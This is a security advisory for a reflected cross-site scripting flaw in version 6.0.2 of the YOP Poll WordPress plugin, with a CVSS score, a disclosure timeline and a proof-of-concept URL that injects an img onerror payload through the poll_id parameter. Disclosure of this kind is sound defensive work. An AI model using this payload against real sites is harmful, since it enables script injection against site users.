WordPress YOP Poll 6.0.2 Cross Site Scripting

2019-02-06 / 2019-02-05

Credit: Tim Coen

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-79

 * Vulnerability: XSS
* Affected Software: [YOP Poll](https://wordpress.org/plugins/yop-poll/)
* Affected Version: 6.0.2
* Patched Version: 6.0.3
* CVE: not requested
* Risk: Medium
* Vendor Contacted: 10/25/2018
* Vendor Fix: 11/26/2018
* Public Disclosure: 02/05/2019
* Credit: Tim Coen
##### CVSS
6.1 Medium
[CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N](https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N)
##### Overview
The YOP poll WordPress plugin is vulnerable to reflected XSS as it
echoes the poll_id parameter without proper encoding.
##### Proof of Concept
http://192.168.0.103/wordpress/wp-admin/admin.php?page=yop-polls&action=view-votes&poll_id=1'"><img+src%3Dx+onerror%3Dalert(1)>
##### Timeline
- 10/25/2018 Requested email address via contact form
- 10/25/2018 Vendor responds, advisory sent
- 11/26/2018 Vendor releases fix
- 02/05/2019 Confirmed fix & Disclosure
##### Details & Full Advisory URL
https://security-consulting.icu/blog/2019/02/wordpress-yop-poll-xss/
--
PGP Key: https://pgp.mit.edu/pks/lookup?op=get&search=0x204DCBDD29BA0D89

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WordPress YOP Poll 6.0.2 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.